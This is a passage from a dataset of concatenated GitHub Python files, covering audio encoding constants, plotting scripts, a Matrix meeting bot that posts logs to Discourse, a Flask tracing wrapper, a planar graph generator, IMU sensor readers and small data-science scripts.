print(error)\n\n\n","repo_name":"KeithMc18/FirstProject","sub_path":"Base.py","file_name":"Base.py","file_ext":"py","file_size_in_byte":698,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"14792372757","text":"# Direct from TG's PR (https://github.com/tgstation/tgstation/pull/36492)\n# May bump up quality and rate slightly...\nRECOMPRESS_ARGS = [\n    # Audio Codec\n    '-c:a', 'libvorbis',\n    # Force to mono (should already be, since festival outputs mono...)\n    '-ac', '1',\n    # Sampling rate in Hz. TG uses 16kHz.\n    '-ar', '16000',\n    # Audio quality [0,9]. TG uses 0.\n    '-q:a', '0',\n    # Playback speed\n    '-speed', '0',\n    # Number of threads to use. 
This works OK on my laptop, but you may need fewer\n    # Now specified in -j.\n    #'-threads', '8',\n    # Force overwrite\n    '-y']\n\n# Have to do the trimming separately.\nPRE_SOX_ARGS = 'trim 0 -0.1' # Trim off the last 0.1 s.\n","repo_name":"N3X15/ss13-vox","sub_path":"ss13vox/consts.py","file_name":"consts.py","file_ext":"py","file_size_in_byte":701,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"37"} +{"seq_id":"40657128940","text":"\ndef solution(babbling):\n    answer = 0\n    speakable = [\"aya\", \"ye\", \"woo\", \"ma\"]\n    for i in range(len(babbling)):\n        for j in range(len(speakable)):\n            if speakable[j] in babbling[i]:\n                babbling[i] = babbling[i].replace(speakable[j], '1')\n        if babbling[i].isdecimal():\n            answer += 1\n    return answer\n\nif __name__ == '__main__':\n    test = [\"aya\", \"yee\", \"u\", \"maa\", \"wyeoo\"]\n    print(solution(test))","repo_name":"Nachokang/Algorithm_practice","sub_path":"Programmers/Level0/babbling.py","file_name":"babbling.py","file_ext":"py","file_size_in_byte":465,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"74937204266","text":"import dataclasses\n\n\n@dataclasses.dataclass\nclass Piece:\n    piece_id: str\n    block_id: int\n    start: int\n    length: int\n    owner: str\n\n    def _get_fields(self):\n        return [getattr(self, field) for field in self.__annotations__]\n\n    def __iter__(self):\n        for field in self._get_fields():\n            yield field\n","repo_name":"psedit/cte","sub_path":"src/server/services/piece.py","file_name":"piece.py","file_ext":"py","file_size_in_byte":337,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"37"} +{"seq_id":"28056563632","text":"import pandas as pd\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np \r\nfrom scipy import stats\r\n\r\ndata1 = pd.read_csv(\"benchmarking_system_1.csv\")\r\ndata2 = pd.read_csv(\"benchmarking_system_2.csv\")\r\ndata3 = pd.read_csv(\"benchmarking_system_3.csv\")\r\ndata4 = pd.read_csv(\"benchmarking_system_4.csv\")\r\ndata5 = pd.read_csv(\"benchmarking_system_5.csv\")\r\n#Filter an insignificant number of outliers\r\ndata5 = data5[data5[\"User Execution Time with Bloom Filters (s)\"] < 4.6]\r\ndata6 = pd.read_csv(\"benchmarking_system_6.csv\")\r\n\r\ndata = [data1, data2, data3, data4, data5, data6]\r\n\r\nreal_optimized = pd.concat([df[\"User Execution Time with Bloom Filters (s)\"] + df[\"System Execution Time with Bloom Filters (s)\"] for df in data])\r\n\r\nnum_users = pd.concat([df[\"Number of Users in System\"] for df in data])\r\n\r\nreal_unoptimized = pd.concat([df[\"User Execution Time without Bloom Filters (s)\"] + df[\"System Execution Time without Bloom Filters (s)\"] for df in data])\r\n\r\n\r\nplt.scatter(num_users, real_unoptimized, s=15, label = \"System without Bloom Filters (1)\")\r\nplt.scatter(num_users, real_optimized, s=15, label = \"System with Bloom Filters (2)\")\r\nplt.scatter(num_users, real_unoptimized - real_optimized, s= 15, label=\"Difference in Execution Times between (1) and (2)\")\r\n\r\n#slope, intercept, r_value, p_value, std_err = stats.linregress(num_users,real_unoptimized)\r\n#plt.annotate('y = {:.3e}x - {:.3e}\\nR\\u00b2 = {:.3f}'.format(slope, abs(intercept), r_value**2), xy=(0.46, 0.65), xycoords='figure fraction', color='darkblue', size=7)\r\n#plt.plot(num_users, slope*num_users+intercept, linestyle='--', color='darkblue')\r\n\r\n#slope, intercept, r_value, p_value, std_err = 
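# Editor's note on the commented-out fits here: stats.linregress returns
# slope, intercept and r-value (among others); a tiny self-check on exact
# data, runnable independently of the benchmark CSVs:
_res = stats.linregress([0, 1, 2], [1, 3, 5])
assert round(_res.slope, 9) == 2.0 and round(_res.intercept, 9) == 1.0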
stats.linregress(num_users,real_optimized)\r\n#plt.annotate('y = {:.3e}x - {:.3e}\\nR\\u00b2 = {:.3f}'.format(slope, abs(intercept), r_value**2), xy=(0.69, 0.60), xycoords='figure fraction', color='orangered', size=7)\r\n#plt.plot(num_users, slope*num_users+intercept, linestyle='--', color='orangered')\r\n\r\n#slope, intercept, r_value, p_value, std_err = stats.linregress(num_users,real_unoptimized - real_optimized)\r\n#plt.annotate('y = {:.3e}x + {:.3e}\\nR\\u00b2 = {:.3f}'.format(slope, intercept, r_value**2), xy=(0.57, 0.25), xycoords='figure fraction', color='limegreen', size=7)\r\n#plt.plot(num_users, slope*num_users+intercept, linestyle='--', color='limegreen')\r\n\r\nplt.title(\"Execution Time of Aggregate Query for Different Number of Users\")\r\nplt.xlabel(\"Number of Users\")\r\nplt.ylabel(\"Execution Time (s)\")\r\nplt.legend()\r\nplt.savefig('Scatter Plot.png') #save before show(): show() clears the current figure\r\nplt.show()","repo_name":"Shirley-L-Sanchez/private_db","sub_path":"aggregate_query_benchmarking_self_contained/benchmarking_scatter_plot.py","file_name":"benchmarking_scatter_plot.py","file_ext":"py","file_size_in_byte":2523,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"45513375118","text":"\"\"\"\nthis should go through directory tree comparison/* and plot the optimized\nportfolio performance versus the hodl performances\n\"\"\"\n\nimport os\nimport pandas as pd\nimport global_vars\n\nimport plotly.graph_objs as go\nfrom plotly.offline import plot\n\n\n# discover results csv\nsampled_sectors_dir = os.listdir(\"comparisons\")\nfor sector_dir in sampled_sectors_dir:\n    csv_files = os.listdir(os.path.join(\"comparisons\", sector_dir))\n    print(\"Plotting for {}\".format(sector_dir))\n\n    # extract the optimized file\n    # optimized = \"optimized_\" + sector_dir + \".csv\"\n    # equal_weights = \"equal_weights\" + sector_dir + \".csv\"\n    # csv_files.remove(optimized)\n    # csv_files.remove(equal_weights)\n\n    traces = []\n    for idx, csv in enumerate(csv_files):\n        # figure out what type of csv this is\n        if \"optimized_\" in csv:\n            trace_name = \"optimized_portfolio\"\n            dash = \"longdash\"\n        elif \"equal_weights_\" in csv:\n            trace_name = \"equal_weights\"\n            dash = \"dash\"\n        else:\n            # it's a hodl trace\n            trace_name = csv.split('.')[0]\n            dash = \"solid\"\n\n        df = pd.read_csv(os.path.join(\"comparisons\", sector_dir, csv),\n                         header=None,\n                         names=[\"date\", \"portfolio_value\"])\n        traces.append(go.Scatter(\n            x=df['date'],\n            y=df['portfolio_value'],\n            mode=\"lines\",\n            name=trace_name,\n            line=dict(\n                color=global_vars.colors[idx],\n                dash=dash,\n                smoothing=1.2\n            )\n        ))\n\n    # plot each sector\n    trace_filename = sector_dir + \"_portfolios_compared.html\"\n    sector_title = sector_dir.replace('_', ' ').title()\n    layout = go.Layout(\n        title=sector_title,\n        xaxis=dict(\n            title='Date',\n            showticklabels=True,\n            tickangle=45\n        ),\n        yaxis=dict(\n            title='Portfolio Value (BTC)',\n            showticklabels=True,\n            tickangle=45\n        )\n    )\n    fig = go.Figure(data=traces, layout=layout)\n    print(\"Plot for {0} saved to {1}\".format(sector_title, trace_filename))\n    plot(fig, filename=trace_filename)\n","repo_name":"wphan/cryptocurrency_market_analysis","sub_path":"plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":2212,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"22363364402","text":"import json\nimport tempfile\nfrom datetime import datetime\n\nimport jinja2\nimport requests\n\nfrom ...util import get_room_alias, 
get_room_name, time_from_timestamp\n\n\n# helpers\ndef config(meetbot):\n config = meetbot.config[\"backend_data\"][\"ansible\"]\n return config\n\n\ndef parse_db_time(t):\n return datetime.utcfromtimestamp(int(t) / 1000).strftime(\"%Y-%m-%d %H:%M:%S\")\n\n\ndef parse_db_logs(items):\n logs = tuple()\n for row in items:\n time = parse_db_time(row[1])\n log = f\"{time} | {row[2]} | {row[3]}\"\n logs += (log,)\n\n log_data = \"\\n\".join(logs).encode(\"utf-8\")\n return log_data\n\n\ndef render(meetbot, templatename, **kwargs):\n def formatdate(timestamp):\n \"\"\"timestampt to date filter\"\"\"\n return time_from_timestamp(int(timestamp))\n\n def formattime(timestamp):\n \"\"\"timestampt to date filter\"\"\"\n return time_from_timestamp(int(timestamp), format=\"%H:%M:%S\")\n\n def removecommand(line, command=\"\"):\n return line.removeprefix(f\"^{command}\").strip()\n\n j2env = jinja2.Environment(\n trim_blocks=True,\n lstrip_blocks=True,\n autoescape=jinja2.select_autoescape([\"html\", \"xml\"]),\n )\n j2env.filters[\"formatdate\"] = formatdate\n j2env.filters[\"formattime\"] = formattime\n j2env.filters[\"removecommand\"] = removecommand\n\n template = meetbot.loader.sync_read_file(f\"meetings/backends/ansible/{templatename}\")\n return j2env.from_string(template.decode()).render(**kwargs)\n\n\n# async helpers\nasync def upload_log_to_discourse(config, log_data, logger):\n # DRY this\n api_user = config[\"discourse_user\"]\n api_key = config[\"discourse_key\"]\n url = config[\"discourse_url\"] + \"/uploads.json\"\n\n headers = {\"Api-Key\": api_key, \"Api-Username\": api_user}\n\n fp = tempfile.TemporaryFile()\n fp.write(str.encode(log_data))\n fp.seek(0)\n\n res = requests.post( # noqa: S113\n url,\n headers=headers,\n data={\"type\": \"text\"},\n files={\"files[]\": (\"full_log.txt\", fp, \"text/plain\")},\n )\n\n fp.close()\n\n if res.status_code == 200:\n r = json.loads(res.content)\n txt = f\"[full_log.txt|attachment]({r['short_url']})\"\n return txt\n else:\n logger.info(res.status_code)\n logger.info(res.content)\n return \"\"\n\n\nasync def post_to_discourse(config, raw_post, title, logger):\n api_user = config[\"discourse_user\"]\n api_key = config[\"discourse_key\"]\n url = config[\"discourse_url\"] + \"/posts\"\n\n headers = {\"Api-Key\": api_key, \"Api-Username\": api_user}\n payload = {\"title\": title, \"raw\": raw_post, \"category\": config[\"category_id\"]}\n\n res = requests.post(url, headers=headers, data=payload) # noqa: S113\n r = json.loads(res.content)\n logger.info(f\"Discourse POST: {res.status_code}\")\n if res.status_code == 200:\n r = json.loads(res.content)\n return r[\"topic_id\"]\n else:\n return \"\"\n\n\n# required backend methods\nasync def startmeeting(meetbot, event, meeting):\n room_alias = await get_room_alias(meetbot.client, event.room_id)\n room_name = await get_room_name(meetbot.client, event.room_id)\n\n meetbot.log.info(f\"Ansible: Meeting started in {room_name} ({room_alias} / {event.room_id})\")\n meetbot.log.info(f'Will post to Discourse as {config(meetbot)[\"discourse_user\"]}')\n\n\nasync def endmeeting(meetbot, event, meeting):\n room_alias = await get_room_alias(meetbot.client, event.room_id)\n room_name = await get_room_name(meetbot.client, event.room_id)\n items = await meetbot.get_items(meeting[\"meeting_id\"])\n people_present = await meetbot.get_people_present(meeting[\"meeting_id\"])\n\n meetbot.log.info(f\"Ansible: Meeting ended in {room_name} ({room_alias} / {event.room_id})\")\n\n if len(items) == 0:\n meetbot.log.info(\"No 
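# Editor's minimal illustration (not from this bot) of the custom-filter
# mechanism render() relies on above:
_env = jinja2.Environment()
_env.filters["shout"] = lambda s: s.upper()
assert _env.from_string("{{ 'hi' | shout }}").render() == "HI"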
entries\")\n await event.respond(\"No logs to post to Discourse\")\n return ()\n\n # Upload full_log to Discourse\n log_path = await upload_log_to_discourse(\n config(meetbot), render(meetbot, \"text_log.j2\", items=items), meetbot.log\n )\n meetbot.log.info(f\"Discourse Log URL: {log_path}\")\n\n minutes = (\n render(\n meetbot,\n \"html_minutes.j2\",\n items=items,\n name=meeting[\"meeting_name\"],\n room=room_name,\n alias=room_alias,\n people_present=people_present,\n logs=log_path,\n ),\n )\n meetbot.log.info(f\"Discourse Log URL: {minutes}\")\n title = f\"Meeting Log | {room_name} | { time_from_timestamp(int(items[0]['timestamp'])) }\"\n\n pid = await post_to_discourse(config(meetbot), minutes, title, meetbot.log)\n if pid != \"\":\n url = config(meetbot)[\"discourse_url\"] + \"/t/\" + str(pid)\n await event.respond(f\"Logs [posted to Discourse]({url})\")\n","repo_name":"GregSutcliffe/maubot-meetings","sub_path":"meetings/backends/ansible/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":4767,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"37"} +{"seq_id":"26594277099","text":"import os\nimport json\nfrom pprint import pprint\n\nberks_package_folder=\"/Users/agautam/work/git/chef/hs_hsconfig/tmp/cookbooks\"\n\nfor cookbook in os.listdir(berks_package_folder):\n metadata_json_file = os.path.join(berks_package_folder, cookbook, \"metadata.json\")\n # print(\"Checking: \" + metadata_json_file)\n if os.path.isfile(metadata_json_file):\n with open(metadata_json_file) as data_file:\n metadata = json.load(data_file)\n # pprint(metadata)\n if cookbook != metadata.get(\"name\"):\n print(\"========= Name does not match for cookbook \" + cookbook)\n print(\"{} {}\".format(metadata.get(\"name\"), metadata.get(\"version\")))\n\n# for dirName, subdirList, fileList in os.walk(berks_package_folder):\n# print('Found directory: %s' % dirName)\n# for fname in fileList:\n# print('\\t%s' % fname)\n# if \"metadata.\"","repo_name":"ajaygautam/PythonScraps","sub_path":"python_scraps/print_chef_dependencies.py","file_name":"print_chef_dependencies.py","file_ext":"py","file_size_in_byte":877,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"25754593509","text":"import logging\nimport traceback\nfrom functools import wraps\n\nfrom thundra import constants\nfrom thundra.application.global_application_info_provider import GlobalApplicationInfoProvider\nfrom thundra.config import config_names\nfrom thundra.config.config_provider import ConfigProvider\nfrom thundra.context.execution_context_manager import ExecutionContextManager\nfrom thundra.context.plugin_context import PluginContext\nfrom thundra.context.tracing_execution_context_provider import TracingExecutionContextProvider\nfrom thundra.wrappers import wrapper_utils, web_wrapper_utils\nfrom thundra.wrappers.base_wrapper import BaseWrapper\nfrom thundra.wrappers.flask import flask_executor\n\ntry:\n from flask import request, g\nexcept ImportError:\n request = None\n g = None\n\nlogger = logging.getLogger(__name__)\n\n\nclass FlaskWrapper(BaseWrapper):\n\n def __init__(self, api_key=None, disable_trace=False, disable_metric=True, disable_log=True, opts=None):\n super(FlaskWrapper, self).__init__(api_key, disable_trace, disable_metric, disable_log, opts)\n self.application_info_provider = GlobalApplicationInfoProvider()\n ExecutionContextManager.set_provider(TracingExecutionContextProvider())\n self.plugin_context = 
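# Editor's stripped-down sketch of the wrap-and-mark idiom FlaskWrapper's
# __call__ uses below: tag wrapped callables so wrapping twice is a no-op.
from functools import wraps
def _wrap_once(fn):
    if getattr(fn, "_wrapped", False):
        return fn
    @wraps(fn)
    def _inner(*args, **kwargs):
        return fn(*args, **kwargs)
    _inner._wrapped = True
    return _inner
_f = _wrap_once(_wrap_once(lambda: 1))
assert _f() == 1 and _f._wrapped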
PluginContext(application_info=self.application_info_provider.get_application_info(),\n request_count=0,\n executor=flask_executor,\n api_key=self.api_key)\n\n self.plugins = wrapper_utils.initialize_plugins(self.plugin_context, disable_trace, disable_metric, disable_log,\n config=self.config)\n\n web_wrapper_utils.update_application_info(self.application_info_provider, self.plugin_context.application_info,\n constants.ClassNames['FLASK'])\n\n def before_request(self, _request):\n # Execution context initialization\n execution_context = wrapper_utils.create_execution_context()\n execution_context.platform_data['request'] = _request\n\n # Execute plugin hooks before running user's handler\n self.plugin_context.request_count += 1\n self.execute_hook('before:invocation', execution_context)\n\n if g is not None:\n g.thundra_execution_context = execution_context\n\n return execution_context\n\n def after_request(self, response):\n try:\n if g is not None and hasattr(g, 'thundra_execution_context'):\n execution_context = g.thundra_execution_context\n if response:\n execution_context.response = response\n except Exception as e:\n logger.error('Error setting response to context for Thundra: {}'.format(e))\n return response\n\n def teardown_request(self, exception=None):\n try:\n if g is not None and hasattr(g, 'thundra_execution_context'):\n execution_context = g.thundra_execution_context\n if exception:\n execution_context.error = exception\n self.prepare_and_send_reports_async(execution_context)\n except Exception as e:\n logger.error('Error during the request teardown of Thundra: {}'.format(e))\n\n def __call__(self, original_func):\n if hasattr(original_func, \"_thundra_wrapped\") or ConfigProvider.get(config_names.THUNDRA_DISABLE, False):\n return original_func\n\n @wraps(original_func)\n def wrapper(*args, **kwargs):\n if request is None or getattr(request, '_thundra_wrapped', False):\n return original_func(*args, **kwargs)\n setattr(request, '_thundra_wrapped', True)\n try:\n execution_context = self.before_request(request)\n except Exception as e:\n logger.error('Error during the before part of Thundra: {}'.format(e))\n return original_func(*args, **kwargs)\n\n response = None\n # Invoke user handler\n try:\n response = original_func(*args, **kwargs)\n execution_context.response = response\n except Exception as e:\n try:\n error = {\n 'type': type(e).__name__,\n 'message': str(e),\n 'traceback': traceback.format_exc()\n }\n self.teardown_request(error)\n except Exception as e_in:\n logger.error(\"Error during the after part of Thundra: {}\".format(e_in))\n raise e\n\n try:\n self.teardown_request()\n except Exception as e:\n logger.error(\"Error during the after part of Thundra: {}\".format(e))\n return response\n\n setattr(wrapper, '_thundra_wrapped', True)\n return wrapper\n\n call = __call__\n","repo_name":"thundra-io/thundra-agent-python","sub_path":"thundra/wrappers/flask/flask_wrapper.py","file_name":"flask_wrapper.py","file_ext":"py","file_size_in_byte":4991,"program_lang":"python","lang":"en","doc_type":"code","stars":38,"dataset":"github-code","pt":"37"} +{"seq_id":"43500889347","text":"#!/usr/bin/env python3\n\ntry:\n integer_types = (int, long)\n range = xrange\nexcept NameError: # Python 3\n integer_types = (int,)\n\nimport random\nfrom graphtheory.structures.edges import Edge\n\n\nclass PlanarGraphFactory:\n \"\"\"The class for planar graph generators.\"\"\"\n\n def __init__(self, graph_class):\n \"\"\"Get a graph class.\"\"\"\n self.cls = graph_class\n\n def make_cyclic(self, 
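`FlaskWrapper.__call__` in the thundra record above guards against double instrumentation with a `_thundra_wrapped` sentinel before running its before/teardown hooks. A stripped-down sketch of that wrap-once pattern, with print statements standing in for the Thundra plumbing:

```python
from functools import wraps

def wrap_once(func):
    if getattr(func, "_wrapped", False):
        return func                      # never double-instrument a handler

    @wraps(func)
    def wrapper(*args, **kwargs):
        print("before handler")          # stands in for before_request()
        try:
            return func(*args, **kwargs)
        finally:
            print("teardown")            # stands in for teardown_request()

    wrapper._wrapped = True
    return wrapper
```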
n=3):\n \"\"\"Create a weighted cyclic topological graph.\"\"\"\n if n < 3:\n raise ValueError(\"number of vertices must be greater than 2\")\n graph = self.cls(n, False)\n graph.edge_next = dict()\n graph.edge_prev = dict()\n graph.face2edge = dict()\n graph.edge2face = dict()\n weights = list(range(1, 1 + n)) # different weights\n random.shuffle(weights)\n for node in range(n):\n graph.add_node(node)\n L = [] # list of edges\n for i in range(n):\n edge1 = Edge(i, (i+1) % n, weights.pop())\n graph.add_edge(edge1)\n L.append(edge1)\n graph.edge2face[edge1] = 0\n graph.edge2face[~edge1] = 1\n graph.face2edge[0] = L[0]\n graph.face2edge[1] = ~(L[0])\n for i in range(n):\n # At the node i.\n edge1 = L[i]\n edge2 = L[(i+n-1) % n]\n graph.edge_next[edge1] = ~edge2\n graph.edge_next[~edge2] = edge1\n graph.edge_prev[edge1] = ~edge2\n graph.edge_prev[~edge2] = edge1\n return graph\n\n# 1-------2\n# |\\ /|\n# | \\ / |\n# | \\ / | wheel graph W_7\n# 6---0---3 planar Halin graph\n# | / \\ |\n# | / \\ |\n# |/ \\|\n# 5-------4\n\n def make_wheel(self, n=4):\n \"\"\"Create a weighted wheel topological graph.\"\"\"\n if n < 4:\n raise ValueError(\"number of vertices must be greater than 3\")\n graph = self.cls(n, False)\n graph.edge_next = dict()\n graph.edge_prev = dict()\n graph.face2edge = dict()\n graph.edge2face = dict()\n weights = list(range(1, 1 + 2 * n - 2))\n random.shuffle(weights)\n for node in range(n):\n graph.add_node(node)\n hub = 0\n # L[0] and M[0] are empty for convenience.\n L = [None] # list of edges, to the center\n M = [None] # list of edges, circle\n for i in range(1, n):\n edge1 = Edge(i, hub, weights.pop())\n edge3 = Edge(i, i+1 if (i < n-1) else 1, weights.pop())\n graph.add_edge(edge1)\n graph.add_edge(edge3)\n L.append(edge1)\n M.append(edge3)\n for i in range(1, n):\n edge1 = L[i]\n edge2 = L[i+1 if (i < n-1) else 1]\n edge3 = M[i]\n edge4 = M[i-1 if i > 1 else n-1]\n # At the hub.\n graph.edge_next[~edge2] = ~edge1\n graph.edge_prev[~edge1] = ~edge2\n # At the node i.\n graph.edge_next[edge1] = edge3\n graph.edge_next[edge3] = ~edge4\n graph.edge_next[~edge4] = edge1\n graph.edge_prev[edge1] = ~edge4\n graph.edge_prev[~edge4] = edge3\n graph.edge_prev[edge3] = edge1\n # Faces at hub [~edge1, edge3, edge2]\n graph.edge2face[~edge1] = i\n graph.edge2face[edge3] = i\n graph.edge2face[edge2] = i\n graph.edge2face[~edge3] = 0\n graph.face2edge[0] = ~edge3\n graph.face2edge[i] = edge3\n return graph\n\n# EOF\n","repo_name":"ufkapano/graphtheory","sub_path":"graphtheory/planarity/planarfactory.py","file_name":"planarfactory.py","file_ext":"py","file_size_in_byte":3516,"program_lang":"python","lang":"en","doc_type":"code","stars":42,"dataset":"github-code","pt":"37"} +{"seq_id":"3675501153","text":"#\nimport board # pip3 install adafruit-blinka\nimport adafruit_bno055 # pip3 install adafruit-circuitpython-bno055 (NOT adafruit-bno055)\nimport datetime\nimport uuid\n\n#\nfrom DataClass_BNO055.Base import Base\nfrom DataClass_BNO055.Quaternion import Quaternion\nfrom DataClass_BNO055.Temperature import Temperature\nfrom DataClass_BNO055.Vector3 import Vector3\n\n#\ni2c = board.I2C()\nsensor = adafruit_bno055.BNO055_I2C(i2c, address=0x29)\n\n# Configuration\n\n# Turn on external clock crystal\nsensor._write_register(0x3F, 0x01)\n# Read from register to check if external crystal is enabled\nexternal_crystal_enabled = sensor._read_register(0x3F)\nprint(\"external crystal: \", bool(external_crystal_enabled & 0x01))\n\n\n# Acceleration\ndef getAccelerometerDataBase(sensor: 
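`make_cyclic` in the planarfactory record above maintains `edge_next`/`edge_prev` maps over pairs of directed half-edges. The same bookkeeping as a standalone sketch, with plain tuples in place of `Edge` objects, checking that `edge_prev` inverts `edge_next` around each vertex of the n-cycle:

```python
# Each undirected edge (i, j) of the n-cycle is stored as two directed
# half-edges; at every degree-2 vertex, next and prev coincide, exactly
# as in make_cyclic above.
def cycle_halfedges(n=5):
    edge_next, edge_prev = {}, {}
    for i in range(n):
        e1 = (i, (i + 1) % n)        # half-edge leaving vertex i forward
        rev2 = (i, (i - 1) % n)      # reversed incoming edge, also leaving i
        edge_next[e1] = rev2
        edge_next[rev2] = e1
        edge_prev[e1] = rev2
        edge_prev[rev2] = e1
    return edge_next, edge_prev

nxt, prv = cycle_halfedges()
assert all(prv[nxt[e]] == e for e in nxt)   # prev is the inverse of next
```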
adafruit_bno055.BNO055_I2C) -> Vector3:\n \n accel = sensor.acceleration\n\n return Vector3(\n x = accel[0],\n y = accel[1],\n z = accel[2]\n )\n\ndef getAccelerometerData(sensor: adafruit_bno055.BNO055_I2C, session_id: uuid.UUID, datetime: datetime) -> Base:\n \n return Base(\n session_id = str(session_id),\n timestamp = str(datetime.datetime.now()),\n data = getAccelerometerDataBase(sensor).__dict__\n )\n\n# Gyroscope\ndef getGyroscopeDataBase(sensor: adafruit_bno055.BNO055_I2C) -> Vector3:\n \n gyro = sensor.gyro\n\n return Vector3(\n x = gyro[0],\n y = gyro[1],\n z = gyro[2]\n )\n\ndef getGyroscopeData(sensor: adafruit_bno055.BNO055_I2C, session_id: uuid.UUID, datetime: datetime) -> Base:\n \n return Base(\n session_id = str(session_id),\n timestamp = str(datetime.datetime.now()),\n data = getGyroscopeDataBase(sensor).__dict__\n )\n\n# Magnetometer\ndef getMagnetometerDataBase(sensor: adafruit_bno055.BNO055_I2C) -> Vector3:\n \n mag = sensor.magnetic\n\n return Vector3(\n x = mag[0],\n y = mag[1],\n z = mag[2]\n )\n\ndef getMagnetometerData(sensor: adafruit_bno055.BNO055_I2C, session_id: uuid.UUID, datetime: datetime) -> Base:\n \n return Base(\n session_id = str(session_id),\n timestamp = str(datetime.datetime.now()),\n data = getMagnetometerDataBase(sensor).__dict__\n )\n\n# Euler\ndef getEulerDataBase(sensor: adafruit_bno055.BNO055_I2C) -> Vector3:\n \n euler = sensor.euler\n\n return Vector3(\n x = euler[0],\n y = euler[1],\n z = euler[2]\n )\n\ndef getEulerData(sensor: adafruit_bno055.BNO055_I2C, session_id: uuid.UUID, datetime: datetime) -> Base:\n \n return Base(\n session_id = str(session_id),\n timestamp = str(datetime.datetime.now()),\n data = getEulerDataBase(sensor).__dict__\n )\n\n# Quaternion\ndef getQuaternionDataBase(sensor: adafruit_bno055.BNO055_I2C) -> Quaternion:\n \n quat = sensor.quaternion\n\n return Quaternion(\n w = quat[0],\n x = quat[1],\n y = quat[2],\n z = quat[3]\n ) \n\ndef getQuaternionData(sensor: adafruit_bno055.BNO055_I2C, session_id: uuid.UUID, datetime: datetime) -> Base:\n \n return Base(\n session_id = str(session_id),\n timestamp = str(datetime.datetime.now()),\n data = getQuaternionDataBase(sensor).__dict__\n )\n\n# Linear Acceleration\ndef getLinearAccelerationDataBase(sensor: adafruit_bno055.BNO055_I2C) -> Vector3:\n \n linear_accel = sensor.linear_acceleration\n\n return Vector3(\n x = linear_accel[0],\n y = linear_accel[1],\n z = linear_accel[2]\n )\n\ndef getLinearAccelerationData(sensor: adafruit_bno055.BNO055_I2C, session_id: uuid.UUID, datetime: datetime) -> Base:\n \n return Base(\n session_id = str(session_id),\n timestamp = str(datetime.datetime.now()),\n data = getLinearAccelerationDataBase(sensor).__dict__\n ) \n\n# Gravity\ndef getGravityDataBase(sensor: adafruit_bno055.BNO055_I2C) -> Vector3:\n \n gravity = sensor.gravity\n\n return Vector3(\n x = gravity[0],\n y = gravity[1],\n z = gravity[2]\n )\n\ndef getGravityData(sensor: adafruit_bno055.BNO055_I2C, session_id: uuid.UUID, datetime: datetime) -> Base:\n \n return Base(\n session_id = str(session_id),\n timestamp = str(datetime.datetime.now()),\n data = getGravityDataBase(sensor).__dict__\n )\n\n# Temperature\ndef getTemperatureDataBase(sensor: adafruit_bno055.BNO055_I2C) -> Temperature:\n \n temp = sensor.temperature\n\n return Temperature(\n temp = temp\n )\n\ndef getTemperatureData(sensor: adafruit_bno055.BNO055_I2C, session_id: uuid.UUID, datetime: datetime) -> Base:\n\n return Base(\n session_id = str(session_id),\n timestamp = str(datetime.datetime.now()),\n data = 
getTemperatureDataBase(sensor).__dict__\n ) \n\n#\ndef getPitchRollData(sensor: adafruit_bno055.BNO055_I2C) -> str:\n \n ox, oy, oz = -sensor.euler[0], sensor.euler[1], sensor.euler[2]\n ax, ay, az = sensor.linear_acceleration[0], sensor.linear_acceleration[1], sensor.linear_acceleration[2]\n\n return f\"{oy}, {ox}, {oz}, {ax}, {ay}, {az}\"\n\ndef getMotionControllerData(sensor: adafruit_bno055.BNO055_I2C) -> str:\n \n x, y, z = sensor.euler[0], -sensor.euler[1], sensor.euler[2]\n \n return f\"{x}, {y}, {z}\"","repo_name":"cavemangamesdk/H4","sub_path":"python/motion-controller-project/get_data_BNO055.py","file_name":"get_data_BNO055.py","file_ext":"py","file_size_in_byte":5171,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"37856868467","text":"# https://www.youtube.com/watch?v=lN5jesocJjk&list=PLQVvvaa0QuDfKTOs3Keq_kaG2P55YRn5v&index=3\n\nimport pandas as pd\nimport quandl\nimport math\n\ndf = quandl.get('WIKI/GOOGL')\ndf = df[['Adj. Open', 'Adj. High', 'Adj. Low', 'Adj. Close', 'Adj. Volume']]\ndf['HL_PCT'] = (df['Adj. High'] - df['Adj. Close']) / df['Adj. Close'] * 100.0\ndf['PCT_change'] = (df['Adj. Close'] - df['Adj. Open']) / df['Adj. Open'] * 100.0\n\ndf = df[['Adj. Close','HL_PCT','PCT_change','Adj. Volume']]\n\nforecast_col = 'Adj. Close'\ndf.fillna(-99999, inplace=True) # Getting rid of NaNs. In ML you do not want to get rid of the column so you can replace it with a value such as -99999\n\nforecast_out = int(math.ceil(0.01*len(df)))\n\ndf['label'] = df[forecast_col].shift(-forecast_out)\n\ndf.dropna(inplace=True)\nprint(df.head())","repo_name":"Jorrd/MLTutorial","sub_path":"Video_3.py","file_name":"Video_3.py","file_ext":"py","file_size_in_byte":792,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"19977517229","text":"from gensim.models.phrases import Phraser, Phrases\nfrom tqdm import tqdm\nfrom utils import Corpus\n\nCORPUS_FILE = \"../corpus/corpus_preproc.txt\"\nPHRASES_FILE = \"../data/phrases.txt\"\n\nMODEL_FILE = \"../models/bigram.model\"\nOUT_FILE = \"../corpus/corpus_phrases.txt\"\n\n\ndef load_phrases():\n with open(PHRASES_FILE) as f:\n return [ x.strip() for x in f.readlines() ]\n\n\ndef check_phrase_list(phrase_list, tokens):\n\n for phrase in phrase_list:\n for i in range(len(tokens)):\n if i < len(tokens)-1:\n if phrase.startswith(tokens[i]) and tokens[i+1] in phrase:\n print(phrase)\n tokens[i:i+2] = [ \"\".join(tokens[i:i+2]) ] \n i = i-1\n return tokens\n\n\ndef remove_under(tokens):\n return [ tok.replace(\"_\", \"\") for tok in 